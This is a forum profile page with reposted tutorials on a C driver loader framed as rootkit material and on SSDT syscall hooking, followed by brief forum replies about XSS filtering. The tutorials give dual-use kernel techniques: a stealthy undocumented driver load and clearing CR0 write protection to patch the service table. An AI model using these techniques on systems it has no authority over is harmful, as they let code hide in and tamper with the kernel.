Nytro
Administrators
Posts: 18713 | Days Won: 701

Everything posted by Nytro

  1. Creating your own driver loader in C | Driver Loader | Source Code | Rootkit

January 27, 2011, by genesisdatabase

Technically there are two ways to load a rootkit driver, according to Greg Hoglund in Rootkits: Subverting the Windows Kernel. The first is what he calls "The Quick-and-Dirty Way to Load a Driver": it loads a driver into the kernel without creating any registry keys, by calling the undocumented ZwSetSystemInformation with the SystemLoadAndCallImage information class. The catch is that a driver loaded this way is pageable. In Hoglund's words: "'Pageable' refers to memory that can be swapped to disk. If a driver is pageable, any part of the driver could be paged out (that is, swapped from memory to disk). Sometimes when memory is paged out, it cannot be accessed; an attempt to do so will result in the infamous Blue Screen of Death (a system crash)." A sample loader that uses this method is migbot, whose source code is available from the book. Its loading routine follows; the declarations at the top are the ones the book's migbot loader uses, added here so the snippet compiles on its own:

#include <windows.h>

typedef LONG NTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

/* Undocumented SystemInformationClass used by migbot */
#define SystemLoadAndCallImage 38

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE {
    UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;

typedef VOID     (WINAPI *RTLINITUNICODESTRING)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
typedef NTSTATUS (WINAPI *ZWSETSYSTEMINFORMATION)(DWORD SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength);

RTLINITUNICODESTRING   RtlInitUnicodeString   = NULL;
ZWSETSYSTEMINFORMATION ZwSetSystemInformation = NULL;

//----------------------------------------------------------------
// load a sys file as a driver using undocumented method
//----------------------------------------------------------------
bool load_sysfile()
{
    SYSTEM_LOAD_AND_CALL_IMAGE GregsImage;
    WCHAR daPath[] = L"\\??\\C:\\MIGBOT.SYS";

    //////////////////////////////////////////////////////////////
    // get DLL entry points
    //////////////////////////////////////////////////////////////
    if(!(RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress(
                GetModuleHandle("ntdll.dll"), "RtlInitUnicodeString")))
    {
        return false;
    }

    if(!(ZwSetSystemInformation = (ZWSETSYSTEMINFORMATION)GetProcAddress(
                GetModuleHandle("ntdll.dll"), "ZwSetSystemInformation")))
    {
        return false;
    }

    RtlInitUnicodeString(&(GregsImage.ModuleName), daPath);

    // Ask the kernel to map the image and call its entry point directly
    if(!NT_SUCCESS(ZwSetSystemInformation(SystemLoadAndCallImage,
                                          &GregsImage,
                                          sizeof(SYSTEM_LOAD_AND_CALL_IMAGE))))
    {
        return false;
    }

    return true;
}

What you see above is the loading code of migbotloader. "Migbot does not offer an unload feature; once it is loaded, it cannot be unloaded until reboot. Think of this as a 'fire-and-forget' operation. The advantage to using this method is that it can be stealthier than more-established protocols. The downside is that it complicates the rootkit design. For migbot, this is a good solution; but for complex rootkits with many hooks, this method would require supporting too much overhead."

The other method is the right way to load a driver. According to Hoglund, "the established and correct way to load a driver is to use the Service Control Manager (SCM). Using the SCM causes registry keys to be created. When a driver is loaded using the SCM, it is non-pageable. This means your callback functions, IRP-handling functions, and other important code will not vanish from memory, be paged out, or cause Blue Screens of Death. This is a Good Thing."

Two practical notes apply to both methods: the calling process needs SeLoadDriverPrivilege (in practice, an administrator), and on 64-bit Windows from Vista onward kernel-mode code signing is enforced, so an unsigned .sys will not load by either path. SystemLoadAndCallImage is undocumented, so its availability and behaviour vary across kernel versions; the SCM route is the one that is supported.

bool _util_load_sysfile(char *theDriverName)
{
    char aPath[1024];
    char aCurrentDirectory[515];

    SC_HANDLE sh = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if(!sh)
    {
        return false;
    }

    // The service binary path is built from the current directory, so run the
    // loader from the directory that holds <name>.sys
    GetCurrentDirectory(512, aCurrentDirectory);
    _snprintf(aPath, 1022, "%s\\%s.sys", aCurrentDirectory, theDriverName);
    aPath[1023] = '\0';
    printf("loading %s\n", aPath);

    SC_HANDLE rh = CreateService(sh,
                                 theDriverName,
                                 theDriverName,
                                 SERVICE_ALL_ACCESS,
                                 SERVICE_KERNEL_DRIVER,
                                 SERVICE_DEMAND_START,
                                 SERVICE_ERROR_NORMAL,
                                 aPath,
                                 NULL, NULL, NULL, NULL, NULL);
    if(!rh)
    {
        if (GetLastError() == ERROR_SERVICE_EXISTS)
        {
            // service exists
            rh = OpenService(sh, theDriverName, SERVICE_ALL_ACCESS);
            if(!rh)
            {
                CloseServiceHandle(sh);
                return false;
            }
        }
        else
        {
            CloseServiceHandle(sh);
            return false;
        }
    }

    // start the driver
    if(rh)
    {
        if(0 == StartService(rh, 0, NULL))
        {
            if(ERROR_SERVICE_ALREADY_RUNNING == GetLastError())
            {
                // no real problem
            }
            else
            {
                CloseServiceHandle(sh);
                CloseServiceHandle(rh);
                return false;
            }
        }
        CloseServiceHandle(sh);
        CloseServiceHandle(rh);
    }
    return true;
}

Next is the source code I wrote for a driver loader of your own. I wrote and compiled it a year ago, when I first started looking into rootkits. It is a CLI, menu-driven loader: you can load, unload, start and stop your driver. It should compile in most IDEs; the one used was Microsoft Visual C++ 6.0. The compiled binary (.exe) is also available for download, for whatever you need it for.

/*
 * This source code was written by GenesisDatabase
 * Visit http://genesisdatabase.wordpress.com for more source codes!
 *
 * Date of release: 27th January 2011
 */

#include <windows.h>
#include <stdio.h>

#define Cleanup(x, y, z) {x = y; goto z;}
#define FLUSH fflush(stdin);   /* discards pending input on the MSVC CRT; not portable C */

#define DRIVER_LOADED       0x00000001
#define DRIVER_STARTED      0x00000002
#define DRIVER_STOPPED      0x00000003
#define DRIVER_UNLOADED     0x00000004
#define DRIVER_CANT_LOAD    0x00000010
#define DRIVER_CANT_START   0x00000020
#define DRIVER_CANT_STOP    0x00000030
#define DRIVER_CANT_UNLOAD  0x00000040

typedef struct
{
    DWORD driverstatus;
} DRIVER_LOADER, *PDRIVER_LOADER;

int FileExists(const char *driverpath)
{
    FILE *fExists = fopen(driverpath, "r");
    if(!fExists)
        return 0;
    fclose(fExists);
    return 1;
}

/* Creates the service entry (the registry keys under Services) without starting it.
 * Returns 1 on success, a negative code on failure; GetLastError() is preserved for the caller. */
int myLoadDriver(const char *drivername, const char *driverpath)
{
    SC_HANDLE hSCManager = NULL;   /* initialised so the cleanup path never closes an uninitialised handle */
    SC_HANDLE hService = NULL;
    DWORD err;
    int ret = 1;

    if(!FileExists(driverpath))
        Cleanup(ret, -1, c);

    hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if(!hSCManager)
        Cleanup(ret, -2, c);

    hService = CreateService(hSCManager,
                             drivername,
                             drivername,
                             SERVICE_ALL_ACCESS,
                             SERVICE_KERNEL_DRIVER,
                             SERVICE_DEMAND_START,
                             SERVICE_ERROR_NORMAL,
                             driverpath,        /* full path to the .sys */
                             NULL, NULL, NULL, NULL, NULL);
    if(!hService)
        Cleanup(ret, -3, c);

c:
    err = GetLastError();
    if(hService) CloseServiceHandle(hService);
    if(hSCManager) CloseServiceHandle(hSCManager);
    SetLastError(err);
    return ret;
}

/* Starts an existing driver service: this is the point at which the .sys is mapped into the kernel. */
int myStartDriver(const char *drivername)
{
    SC_HANDLE hSCManager = NULL;
    SC_HANDLE hService = NULL;
    DWORD err;
    int ret = 1;

    hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if(!hSCManager)
        Cleanup(ret, -1, c);

    hService = OpenService(hSCManager, drivername, SERVICE_ALL_ACCESS);
    if(!hService)
        Cleanup(ret, -2, c);

    if(!StartService(hService, 0, NULL))
        Cleanup(ret, -3, c);

c:
    err = GetLastError();
    if(hService) CloseServiceHandle(hService);
    if(hSCManager) CloseServiceHandle(hSCManager);
    SetLastError(err);
    return ret;
}

/* Sends SERVICE_CONTROL_STOP; the driver's DriverUnload routine runs if it registered one. */
int myStopDriver(const char *drivername)
{
    SC_HANDLE hSCManager = NULL;
    SC_HANDLE hService = NULL;
    SERVICE_STATUS ss;
    DWORD err;
    int ret = 1;

    hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if(!hSCManager)
        Cleanup(ret, -1, c);

    hService = OpenService(hSCManager, drivername, SERVICE_ALL_ACCESS);
    if(!hService)
        Cleanup(ret, -2, c);

    if(!ControlService(hService, SERVICE_CONTROL_STOP, &ss))
        Cleanup(ret, -3, c);

c:
    err = GetLastError();
    if(hService) CloseServiceHandle(hService);
    if(hSCManager) CloseServiceHandle(hSCManager);
    SetLastError(err);
    return ret;
}

/* Stops the driver (best effort) and deletes the service entry. */
int myUnloadDriver(const char *drivername)
{
    SC_HANDLE hSCManager = NULL;
    SC_HANDLE hService = NULL;
    SERVICE_STATUS ss;
    DWORD err;
    int ret = 1;

    hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if(!hSCManager)
        Cleanup(ret, -1, c);

    hService = OpenService(hSCManager, drivername, SERVICE_ALL_ACCESS);
    if(!hService)
        Cleanup(ret, -2, c);

    // try to stop service first
    ControlService(hService, SERVICE_CONTROL_STOP, &ss);

    if(!DeleteService(hService))
        Cleanup(ret, -4, c);

c:
    err = GetLastError();
    if(hService) CloseServiceHandle(hService);
    if(hSCManager) CloseServiceHandle(hSCManager);
    SetLastError(err);
    return ret;
}

void funcLoadDriver(DRIVER_LOADER *dl)
{
    char drivername[256+1];
    char driverpath[256+1];
    char selection;
    int err;

    for( ; ; )
    {
        printf(" Enter driver's name\n - ");
        FLUSH;
        scanf("%256[^\n]", drivername);
        printf(" Enter driver's full path\n - ");
        FLUSH;
        scanf("%256[^\n]", driverpath);
        printf(" Confirm (Y - yes | N - no | B - back): ");
        FLUSH;
        scanf("%c", &selection);

        switch(selection)
        {
            case 'y':
            case 'Y':
                printf(" Performing : myLoadDriver\n");
                err = myLoadDriver(drivername, driverpath);
                dl->driverstatus = DRIVER_LOADED;
                if(err != 1)
                {
                    dl->driverstatus = DRIVER_CANT_LOAD;
                    printf(" Error : myLoadDriver (%d)\n", err);
                    printf(" GetLastError: (%d)\n", GetLastError());
                    return;
                }
                printf(" Success : myLoadDriver\n");
                return;
            case 'n':
            case 'N':
                break;
            case 'b':
            case 'B':
                return;
            default:
                printf(" Wrong option selected, default to N\n");
                break;
        }
        printf("\n");
    }
}

void funcStartDriver(DRIVER_LOADER *dl)
{
    char drivername[256+1];
    char selection;
    int err;

    for( ; ; )
    {
        printf(" Enter driver's name\n - ");
        FLUSH;
        scanf("%256[^\n]", drivername);
        printf(" Confirm (Y - yes | N - no | B - back): ");
        FLUSH;
        scanf("%c", &selection);

        switch(selection)
        {
            case 'y':
            case 'Y':
                printf(" Performing : myStartDriver\n");
                err = myStartDriver(drivername);
                dl->driverstatus = DRIVER_STARTED;
                if(err != 1)
                {
                    dl->driverstatus = DRIVER_CANT_START;
                    printf(" Error : myStartDriver (%d)\n", err);
                    printf(" GetLastError: (%d)\n", GetLastError());
                    return;
                }
                printf(" Success : myStartDriver\n");
                return;
            case 'n':
            case 'N':
                break;
            case 'b':
            case 'B':
                return;
            default:
                printf(" Wrong option selected, default to N\n");
                break;
        }
        printf("\n");
    }
}

void funcStopDriver(DRIVER_LOADER *dl)
{
    char drivername[256+1];
    char selection;
    int err;

    for( ; ; )
    {
        printf(" Enter driver's name\n - ");
        FLUSH;
        scanf("%256[^\n]", drivername);
        printf(" Confirm (Y - yes | N - no | B - back): ");
        FLUSH;
        scanf("%c", &selection);

        switch(selection)
        {
            case 'y':
            case 'Y':
                printf(" Performing : myStopDriver\n");
                err = myStopDriver(drivername);
                dl->driverstatus = DRIVER_STOPPED;
                if(err != 1)
                {
                    dl->driverstatus = DRIVER_CANT_STOP;
                    printf(" Error : myStopDriver (%d)\n", err);
                    printf(" GetLastError: (%d)\n", GetLastError());
                    return;
                }
                printf(" Success : myStopDriver\n");
                return;
            case 'n':
            case 'N':
                break;
            case 'b':
            case 'B':
                return;
            default:
                printf(" Wrong option selected, default to N\n");
                break;
        }
        printf("\n");
    }
}

void funcUnloadDriver(DRIVER_LOADER *dl)
{
    char drivername[256+1];
    char selection;
    int err;

    for( ; ; )
    {
        printf(" Enter driver's name\n - ");
        FLUSH;
        scanf("%256[^\n]", drivername);
        printf(" Confirm (Y - yes | N - no | B - back): ");
        FLUSH;
        scanf("%c", &selection);

        switch(selection)
        {
            case 'y':
            case 'Y':
                printf(" Performing : myUnloadDriver\n");
                err = myUnloadDriver(drivername);
                dl->driverstatus = DRIVER_UNLOADED;
                if(err != 1)
                {
                    dl->driverstatus = DRIVER_CANT_UNLOAD;
                    printf(" Error : myUnloadDriver (%d)\n", err);
                    printf(" GetLastError: (%d)\n", GetLastError());
                    return;
                }
                printf(" Success : myUnloadDriver\n");
                return;
            case 'n':
            case 'N':
                break;
            case 'b':
            case 'B':
                return;
            default:
                printf(" Wrong option selected, default to N\n");
                break;
        }
        printf("\n");
    }
}

int main(int argc, char **argv)
{
    DRIVER_LOADER dl;
    int selection;

    dl.driverstatus = 0;

    for( ; ; )
    {
        printf(" 1 - Load a driver\n"
               " 2 - Start service\n"
               " 3 - Stop service\n"
               " 4 - Unload a driver\n"
               " 0 - Exit\n"
               "\n"
               " Select an option: ");
        FLUSH;
        scanf("%d", &selection);

        switch(selection)
        {
            case 1:
                funcLoadDriver(&dl);
                break;
            case 2:
                funcStartDriver(&dl);
                break;
            case 3:
                funcStopDriver(&dl);
                break;
            case 4:
                funcUnloadDriver(&dl);
                break;
            case 0:
                printf(" Thanks for using...\n");
                FLUSH;
                getchar();
                return 0;
            default:
                break;
        }
        printf("\n");
    }

    FLUSH;
    getchar();
    return 0;
}

Source: Creating your own driver loader in C | Driver Loader | Source Code | Rootkit « Genesis Database
  2. [r00tkit] SSDT Hook for dummies

Oct. 10, 2010

Here I am again with my first tutorial that focuses only on kernel land. We will take a simple approach to the System Service Dispatch Table (SSDT) hook. The SSDT is an array holding the addresses of all system service (syscall) routines. A syscall is a function supplied directly by the kernel (kernel land) and usable by every user-land process. To hook a syscall in the SSDT we therefore replace its entry in the table with the address of our own function. The syscall hooked in this tutorial is ZwSetValueKey, and it will be our running example throughout the article.

Code:

/* Author: Shp
 * Website: http://www.shp-box.fr
 * Date: the 9th of October 2010
 * Name: ssdt hook ZwSetValueKey
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see http://www.gnu.org/licenses/
 */

#include <wdm.h>

/****************/
/* Declarations */
/****************/

#pragma pack(1)
typedef struct ServiceDescriptorEntry {
    unsigned int *ServiceTableBase;
    unsigned int *ServiceCounterTableBase;
    unsigned int NumberOfServices;
    unsigned char *ParamTableBase;
} SSDT_Entry;
#pragma pack()

__declspec(dllimport) SSDT_Entry KeServiceDescriptorTable; // We import KeServiceDescriptorTable (exported by the 32-bit ntoskrnl.exe)

// SYSTEMSERVICE yields the SSDT slot holding the address of the Nt* function
// that corresponds to the Zw* stub passed as argument
#define SYSTEMSERVICE(_func) \
    KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_func+1) ]

typedef NTSTATUS (*ZWSETVALUEKEY)(   // The type of the target function
    HANDLE KeyHandle,
    PUNICODE_STRING ValueName,
    ULONG TitleIndex OPTIONAL,
    ULONG Type,
    PVOID Data,
    ULONG DataSize
);

ZWSETVALUEKEY ZwSetValueKeyOriginal; // Saved original; the hook calls it once the SSDT entry points at our function

/*******************/
/* The Hook Function */
/*******************/

// Our hook function refuses value writes under the "Run" and "RunOnce" keys: this
// stops malware from writing its path there to be started again at every reboot.
NTSTATUS ZwSetValueKeyHook(
    IN HANDLE KeyHandle,
    IN PUNICODE_STRING ValueName,
    IN ULONG TitleIndex OPTIONAL,
    IN ULONG Type,
    IN PVOID Data,
    IN ULONG DataSize
)
{
    PKEY_BASIC_INFORMATION pKeyInformation = NULL;
    UNICODE_STRING keyName, targetKey1, targetKey2;
    NTSTATUS ret;
    BOOLEAN blocked = FALSE;
    ULONG size = 0, sizeNeeded = 0;

    DbgPrint("[+] In da hook function =)\n");

    // Query the name of the key being written to. If it is Run or RunOnce we refuse the write.
    ret = ZwQueryKey(KeyHandle, KeyBasicInformation, pKeyInformation, size, &sizeNeeded);
    if((ret == STATUS_BUFFER_TOO_SMALL) || (ret == STATUS_BUFFER_OVERFLOW)) {
        // Buffer too small => allocate what the kernel asked for and query again
        size = sizeNeeded;
        pKeyInformation = (PKEY_BASIC_INFORMATION) ExAllocatePoolWithTag(NonPagedPool, sizeNeeded, 'aaaa');
        if(pKeyInformation == NULL)
            return ZwSetValueKeyOriginal(KeyHandle, ValueName, TitleIndex, Type, Data, DataSize);
        ret = ZwQueryKey(KeyHandle, KeyBasicInformation, pKeyInformation, size, &sizeNeeded);
    }

    if(ret != STATUS_SUCCESS) {
        if(pKeyInformation) ExFreePoolWithTag(pKeyInformation, 'aaaa');
        return ZwSetValueKeyOriginal(KeyHandle, ValueName, TitleIndex, Type, Data, DataSize);
    }

    // Name is a counted WCHAR array (NameLength is in bytes, no terminator);
    // registry key names are case-insensitive, so compare them that way
    keyName.Buffer = pKeyInformation->Name;
    keyName.Length = keyName.MaximumLength = (USHORT) pKeyInformation->NameLength;
    RtlInitUnicodeString(&targetKey1, L"Run");     // first target key
    RtlInitUnicodeString(&targetKey2, L"RunOnce"); // second target key

    blocked = RtlEqualUnicodeString(&keyName, &targetKey1, TRUE) ||
              RtlEqualUnicodeString(&keyName, &targetKey2, TRUE);

    ExFreePoolWithTag(pKeyInformation, 'aaaa');

    if(!blocked) // Not a target key => normal work ...
        return ZwSetValueKeyOriginal(KeyHandle, ValueName, TitleIndex, Type, Data, DataSize);

    DbgPrint("[+] Bypassing Run key writing\n");
    return STATUS_SUCCESS; // ... else the original is never called, so no value is written
}

/*****************/
/* SSDT Functions */
/*****************/

void HookSSDT()
{
    DbgPrint("[+] SSDTHOOK: in HookSSDT()\n");

    ZwSetValueKeyOriginal = (ZWSETVALUEKEY) SYSTEMSERVICE(ZwSetValueKey); // We save the target function address

    // unprotect: clear CR0.WP (bit 16) so that ring 0 may write to read-only pages
    __asm {
        push eax
        mov eax, CR0
        and eax, 0FFFEFFFFh
        mov CR0, eax
        pop eax
    }

    SYSTEMSERVICE(ZwSetValueKey) = (unsigned int) ZwSetValueKeyHook; // We replace the target address with the address of our hook

    // protect: set CR0.WP again
    __asm {
        push eax
        mov eax, CR0
        or eax, 10000h
        mov CR0, eax
        pop eax
    }
}

void UnHookSSDT()
{
    DbgPrint("[+] SSDTHOOK: in UnHookSSDT()\n");

    // unprotect CR0
    __asm {
        push eax
        mov eax, CR0
        and eax, 0FFFEFFFFh
        mov CR0, eax
        pop eax
    }

    SYSTEMSERVICE(ZwSetValueKey) = (unsigned int) ZwSetValueKeyOriginal; // We remove the hook by writing the original address back

    // protect CR0
    __asm {
        push eax
        mov eax, CR0
        or eax, 10000h
        mov CR0, eax
        pop eax
    }
}

VOID unloadFunction(PDRIVER_OBJECT pDriverObject)
{
    UNREFERENCED_PARAMETER(pDriverObject);
    UnHookSSDT(); // unhook function
}

NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
    UNREFERENCED_PARAMETER(pRegistryPath);
    HookSSDT(); // hook function
    pDriverObject->DriverUnload = unloadFunction;
    return STATUS_SUCCESS;
}

The principle

ntoskrnl.exe exports the KeServiceDescriptorTable symbol, so we import it. What does it contain?

typedef struct ServiceDescriptorEntry {
    unsigned int *ServiceTableBase;
    unsigned int *ServiceCounterTableBase;
    unsigned int NumberOfServices;
    unsigned char *ParamTableBase;
} SSDT_Entry;

ServiceTableBase is the address of the SSDT itself and ParamTableBase the address of the System Service Parameter Table (SSPT), which records, for each SSDT entry, the number of bytes of arguments the routine takes.

Here is a very useful macro for our code:

#define SYSTEMSERVICE(_func) \
    KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_func+1) ]

It gives us the SSDT slot in which the address of _func is stored, since ServiceTableBase (the SSDT) is an array of addresses. The macro looks cryptic at first, but WinDbg makes it clear. The index into the table, the expression between the brackets, is *(PULONG)((PUCHAR)_func+1). Let's see what sits at _func+1, that is at ZwSetValueKey+1 in our case:

kd> u ZwSetValueKey l 1
nt!ZwSetValueKey:
804dda08 b8f7000000      mov eax,0F7h

The first instruction of every Zw* stub in ntoskrnl is mov eax, SSDT_INDEX_VALUE; here the index is 0xF7. The opcode B8 occupies one byte and is followed by the 32-bit immediate, which explains the two casts: _func is first cast to PUCHAR so that +1 advances exactly one byte (pointer arithmetic moves by sizeof the pointed-to type, so a PULONG would have jumped 4 bytes), and the result is cast to PULONG so that the dereference reads the whole 4-byte immediate rather than a single byte.

Disable read-only SSDT protection

Finally, we must know that the SSDT cannot simply be written to: it lives in read-only memory, so a write normally faults. There are two techniques to get around this protection, one simple and one less simple. We will use the simplest one in our script, but I will explain in a few words how the second one works.

CR0 trick

Bit 16 of the CR0 control register is the Write Protect (WP) flag: while it is set, even ring-0 code cannot write to pages marked read-only. Clearing that bit lifts the protection. Here is the assembler that disables it:

__asm {
    push eax                // we save eax
    mov eax, CR0            // we put the CR0 value into eax
    and eax, 0FFFEFFFFh     // we clear bit 16 (WP)
    mov CR0, eax            // we update CR0
    pop eax
}

And to enable it again:

__asm {
    push eax
    mov eax, CR0
    or eax, 10000h          // 10000h is NOT 0FFFEFFFFh: set bit 16 again
    mov CR0, eax
    pop eax                 // we restore the saved eax
}

Two caveats a practitioner should keep in mind: CR0 is per-processor, so on a multiprocessor machine production code raises IRQL (or uses the MDL method below) around the write so the thread is not rescheduled onto another CPU between clearing WP and restoring it; the tutorial skips that for simplicity. And the whole technique applies only to the 32-bit kernels it was written for: on x64, KeServiceDescriptorTable is not exported and Kernel Patch Protection (PatchGuard) bug-checks the system when the SSDT is modified.

Memory Descriptor List (MDL)

The second technique uses an MDL, which lets our driver describe a region of memory (here the SSDT) and map it a second time with different properties (here write access). The useful functions are MmCreateMdl, MmBuildMdlForNonPagedPool and MmMapLockedPages, together with the MDL_MAPPED_TO_SYSTEM_VA flag. I have not yet really looked into why one would prefer it, but if you are curious I suggest Ivanlef0u's article (in French).

Now let us look at my script. This is how it works: it hooks the ZwSetValueKey function, which is used to add or modify values in a given registry key. My hook function checks whether the current key is Run or RunOnce; if it is, we refuse the write. Otherwise we let the function do its normal work. The purpose of the script is to protect the system from malware that writes its path into keys such as HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, which would let it, if it had the permission, start again at every reboot.

Source: [r00tkit] SSDT Hook for dummies - Shp Labz
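The hook above can only be exercised inside a 32-bit kernel, so here is an added example (mine, not the tutorial's code) that models the same mechanics in portable user-mode C: a fake service table of function pointers stands in for KeServiceDescriptorTable.ServiceTableBase, the Zw stub is a constructed byte string b8 f7 00 00 00 (mov eax, 0F7h, the index WinDbg showed above) from which the index is pulled exactly as the SYSTEMSERVICE macro does, and the hook applies the Run/RunOnce filter to a counted, NUL-free key name the way KEY_BASIC_INFORMATION delivers it. The table, the stub bytes and the key names are all constructed for the example; nothing here touches CR0 or the real SSDT.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <wchar.h>
#include <wctype.h>

#define STATUS_SUCCESS 0
#define NUM_SERVICES 256

/* Signature of the simulated ZwSetValueKey: the hook only inspects the
 * name of the key being written to (a counted WCHAR array, length in bytes). */
typedef int (*SETVALUEKEY_FN)(const wchar_t *keyname, size_t name_bytes);

static SETVALUEKEY_FN service_table[NUM_SERVICES]; /* stands in for ServiceTableBase */
static SETVALUEKEY_FN original_setvaluekey;        /* saved on hook, restored on unhook */
static int writes_reaching_original;

/* The index a Zw* stub loads into eax: opcode B8 followed by a little-endian
 * 32-bit immediate.  Same arithmetic as *(PULONG)((PUCHAR)_func + 1),
 * written as byte loads instead of an unaligned pointer cast. */
unsigned ssdt_index_from_stub(const uint8_t *stub)
{
    assert(stub[0] == 0xB8);                       /* mov eax, imm32 */
    return (unsigned)stub[1] | ((unsigned)stub[2] << 8) |
           ((unsigned)stub[3] << 16) | ((unsigned)stub[4] << 24);
}

static int original_impl(const wchar_t *keyname, size_t name_bytes)
{
    (void)keyname; (void)name_bytes;
    writes_reaching_original++;                    /* "the value was written" */
    return STATUS_SUCCESS;
}

/* Case-insensitive compare of a counted (not NUL-terminated) name against a
 * literal; registry key names are case-insensitive. */
static int name_is(const wchar_t *name, size_t name_bytes, const wchar_t *target)
{
    size_t n = name_bytes / sizeof(wchar_t);
    if (n != wcslen(target)) return 0;
    for (size_t i = 0; i < n; i++)
        if (towlower(name[i]) != towlower(target[i])) return 0;
    return 1;
}

/* The hook: swallow writes to Run / RunOnce, pass everything else through. */
static int hook_impl(const wchar_t *keyname, size_t name_bytes)
{
    if (name_is(keyname, name_bytes, L"Run") || name_is(keyname, name_bytes, L"RunOnce"))
        return STATUS_SUCCESS;                     /* report success, write never happens */
    return original_setvaluekey(keyname, name_bytes);
}

void hook_ssdt(unsigned idx)
{
    original_setvaluekey = service_table[idx];     /* save before overwriting */
    service_table[idx] = hook_impl;                /* in the kernel: done with CR0.WP cleared */
}

void unhook_ssdt(unsigned idx)
{
    service_table[idx] = original_setvaluekey;     /* write the saved address back */
}

/* Simulates the system service dispatcher: look the routine up by index, call it. */
int dispatch_setvaluekey(unsigned idx, const wchar_t *keyname)
{
    return service_table[idx](keyname, wcslen(keyname) * sizeof(wchar_t));
}

/* Constructed stub bytes: mov eax, 0F7h */
static const uint8_t zw_setvaluekey_stub[] = { 0xB8, 0xF7, 0x00, 0x00, 0x00 };

/* Runs the scenario end to end and returns how many writes reached the
 * original routine, so a caller can check the hook's effect. */
int run_scenario(void)
{
    unsigned idx = ssdt_index_from_stub(zw_setvaluekey_stub);   /* 0xF7 */
    service_table[idx] = original_impl;
    writes_reaching_original = 0;

    hook_ssdt(idx);
    dispatch_setvaluekey(idx, L"Run");             /* blocked */
    dispatch_setvaluekey(idx, L"runonce");         /* blocked: case-insensitive match */
    dispatch_setvaluekey(idx, L"Environment");     /* passes through */
    dispatch_setvaluekey(idx, L"Runner");          /* passes through: not an exact match */
    unhook_ssdt(idx);
    dispatch_setvaluekey(idx, L"Run");             /* passes through: hook removed */
    return writes_reaching_original;               /* 3 */
}

int main(void)
{
    printf("SSDT index 0x%X, %d writes reached the original\n",
           ssdt_index_from_stub(zw_setvaluekey_stub), run_scenario());
    return 0;
}
```

The two things worth noticing are that the original address is saved before the slot is overwritten (the unhook depends on it) and that the filter compares the counted name, not a NUL-terminated string, because KEY_BASIC_INFORMATION.Name carries no terminator.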
  3. Is it fine like this, with the tutorials? I think they are very useful and each should appear on the index as a standalone category. What do you think?
  4. Yes, I like how it sounds, but I want to think it over some more. We will probably put it to a vote, but first we need to discuss it. It remains to be seen. For at least a few days the categories stay as they are.
  5. I looked under "User Banning" but did not find it. Moved to the right place.
  6. Yes, but it still does not really fit under Programming. If it were Web Development, yes. But like this, with HTML, Flash, templates, CSS, Photoshop... it does not really work. If you want PHP or something else, there is Programming. The descriptions are old, as are the categories; I will not move "Web Design" to Programming, but I am open to suggestions. I know there are other posts too, I wanted to move them, but moving a pile of topics is tedious. And I have not really followed that section, so I do not really know what was posted and discussed there.
  7. No, Web Design is for the front-end part; it means design only: layouts or whatever, so Photoshop and friends, and requires no programming knowledge. Graphics only.
  8. MSetup_x86.exe - 17.6MB
  9. I am getting bored already. Banned so you can calm down a bit.
  10. denjacker: It is not good that way either; problems can appear if you filter words. For example, what happens with Western Union? You do not need to be that paranoid; there are a few characters that matter more: , - / \ ' " ( ) . < > : $ = [ ] Fine, that is quite a few, but if they are replaced with HTML entities, apart from 4 extra bytes taken up in the database, there will be no problems. Well, there will be! If someone enters a link and you turn its "/" into entities it will look ugly when displayed, but it all comes down to design.
  11. The simplest, for all kinds of filtering, XSS as well as SQL injection or whatever: convert the special characters, as many as possible, into HTML entities. http://www.exploit-db.com/download_pdf/12904
  12. The main idea is that it will support ARM processors, so it will run on tablets and certain phones. That is the main idea, the big change. And the graphics will have to be adapted for these types of devices too.
  13. Great, it means Romania is starting to pay more attention to information security.
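As an added example (not code from the thread), here is the entity encoding the two replies above discuss, done as output encoding for an HTML text context: only the characters that can change HTML structure are escaped, so a URL's "/" is left alone and renders normally, which addresses the "ugly links" objection. The sample input is constructed. Note that this protects the HTML output only; the defence against SQL injection is parameterized queries, not encoding.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>

/* Returns the entity for c, or NULL if c needs no escaping in an HTML text
 * or quoted-attribute context. */
static const char *entity_for(unsigned char c)
{
    switch (c) {
    case '&':  return "&amp;";
    case '<':  return "&lt;";
    case '>':  return "&gt;";
    case '"':  return "&quot;";
    case '\'': return "&#39;";   /* &apos; is not defined in HTML 4; the numeric form works everywhere */
    default:   return NULL;
    }
}

/* Encode src into dst (capacity dstsz).  Returns the encoded length, or -1
 * when the output would not fit; dst is NUL-terminated on success. */
int html_encode(const char *src, char *dst, size_t dstsz)
{
    size_t n = 0;
    for (; *src; src++) {
        const char *ent = entity_for((unsigned char)*src);
        size_t need = ent ? strlen(ent) : 1;
        if (n + need >= dstsz) return -1;     /* leave room for the terminator */
        if (ent) memcpy(dst + n, ent, need); else dst[n] = *src;
        n += need;
    }
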